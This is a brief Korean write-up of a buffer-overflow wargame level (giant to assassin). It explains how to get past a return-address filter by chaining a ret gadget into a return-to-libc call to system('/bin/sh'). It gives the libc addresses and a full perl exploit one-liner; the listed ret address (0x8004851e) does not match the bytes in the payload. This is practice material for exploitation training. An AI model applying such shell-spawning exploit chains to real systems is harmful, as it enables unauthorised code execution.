[BOF 원정대] giant -> assassin(level 15)

ret 위치에 \xbf, \x40으로 시작하는 주소는 쓸 수 없다.

그래서 ret위치 다음에 쉘코드나 rtl 주소를 올리고 ret만 넘어가면 된다고 생각했다.

힌트는 ret+ret이고 따라서 소스코드에 ret을 ret위치에 작성해주면 그 다음의 코드를 읽을 수 있다.

ret : 0x8004851e

system : 0x40058ae0

exit : 0x400391e0

/bin/sh : 0x400fbff9

공격 코드

./assassin `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "\xe0\x91\x03\x40", "\xf9\xbf\x0f\x40"'`